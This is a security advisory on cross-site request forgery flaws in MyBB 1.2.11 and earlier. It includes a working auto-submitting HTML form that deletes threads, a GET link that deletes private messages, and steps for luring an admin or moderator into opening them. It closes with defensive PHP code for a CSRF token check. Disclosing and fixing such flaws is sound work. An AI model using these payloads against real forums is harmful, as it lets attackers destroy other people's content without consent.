From: nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date: 20.01.2008
Subject: MyBB 1.2.11 Multiple XSRF Vulnerabilities

####################################################
Found: 18 January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################

####1) Delete Threads XSRF Vulnerability:

<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>
</body>
</html>

###PoC:
       1. Create a .html file and copy the code into it.
       2. Upload the file and now send the link to an admin or moderator
       3. Done



####2) Delete PMs XSRF Vulnerability:

This one works via GET only, with no confirmation question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3


###PoC (an easy way):

1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done
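Both findings above share one root cause: a state-changing request is accepted without any proof that it came from the forum's own page, and in the second case it is even accepted over GET. The check a forum should apply, as an added example in PHP that is not MyBB's own code (function names, the `csrf_token` parameter and the session layout are assumptions):

```php
<?php
// Added example, not MyBB code: synchronizer-token CSRF guard covering the two
// request flows in the advisory. Names and session layout are hypothetical.

// Issue one random token per session and keep it server-side.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request (thread or PM delete) may proceed.
// $method is the HTTP method, $params the merged query/body parameters.
function csrf_request_allowed(string $method, array $params, array $session): bool {
    // Deletes must never run on GET: a bare link such as
    // private.php?action=delete&pmid=3 would otherwise act on a single click.
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $params['csrf_token'] ?? '';
    if ($expected === '' || !is_string($supplied)) {
        return false;
    }
    // Constant-time comparison so the check itself does not leak the token.
    return hash_equals($expected, $supplied);
}

// Hidden field to embed in the forum's own forms (moderation.php, private.php).
function csrf_hidden_field(array &$session): string {
    $token = issue_csrf_token($session);
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars($token, ENT_QUOTES, 'UTF-8') . '" />';
}

// Demonstration with a simulated session and the advisory's two requests.
$session = [];
$token = issue_csrf_token($session);

// 1) The cross-site auto-submitting form: POST, but it cannot know the token.
$foreign = ['action' => 'do_multideletethreads', 'fid' => '2', 'threads' => '15|14'];
var_dump(csrf_request_allowed('POST', $foreign, $session));

// 2) The GET delete link: rejected before the token is even examined.
var_dump(csrf_request_allowed('GET', ['action' => 'delete', 'pmid' => '3'], $session));

// A request submitted from the forum's own form, carrying the session token.
var_dump(csrf_request_allowed('POST', $foreign + ['csrf_token' => $token], $session));
```

The token field is rendered into the forum's own forms with `csrf_hidden_field()`; a page on another origin cannot read it, so its forged request fails the comparison.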




